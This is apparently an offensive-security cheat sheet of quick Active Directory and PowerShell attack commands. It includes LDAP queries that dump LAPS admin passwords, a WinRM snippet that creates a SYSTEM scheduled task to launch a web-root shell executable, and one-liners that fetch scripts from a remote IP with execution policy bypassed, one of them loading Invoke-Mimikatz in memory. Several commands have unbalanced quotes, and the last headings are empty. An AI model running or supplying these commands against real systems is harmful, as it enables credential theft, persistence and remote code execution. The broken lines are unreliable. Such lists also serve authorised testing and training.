Quick Commands
LDAP Search
ldapsearch -x -h IP -D '' -w '' -b "DC=DOMAIN,DC=DOMAIN" | grep sAMAccountName:
ldapsearch -v -x -D USER@DOMAIN -w PASSWD -b "DC=DOMAIN,DC=DOMAIN" -h IP "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwdRun Command as User (winrm):
$pw = ConvertTo-SecureString "PASSWD" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential ("USER", $pw)
Invoke-Command -Computer COMPUTER -ScriptBlock { schtasks /create /sc onstart /tn shell /tr C:\inetpub\wwwroot\shell.exe /ru SYSTEM } -Credential $creds
Invoke-Command -Computer COMPUTER-ScriptBlock { schtasks /run /tn shell } -Credential $credsDownload file:
powershell -exec bypass -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.119.131/8888-198.ps1)"
powershell -exec bypass -c IEX (iwr 'http://192.168.119.131/8888-198.ps1' -outfile 8888.ps1)Download & Execute in memory:
powershell -exec bypass -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.119.131/8888-198.ps1, '.\8888-198.ps1')"
IEX((New-Object System.Net.WebClient).downloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1'))AD Users
Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControlGet Domain Machines / IPs
Powershell Grep Table
Powershell Grep
Get user groups
Merge all csv to one
Get process using port
Last updated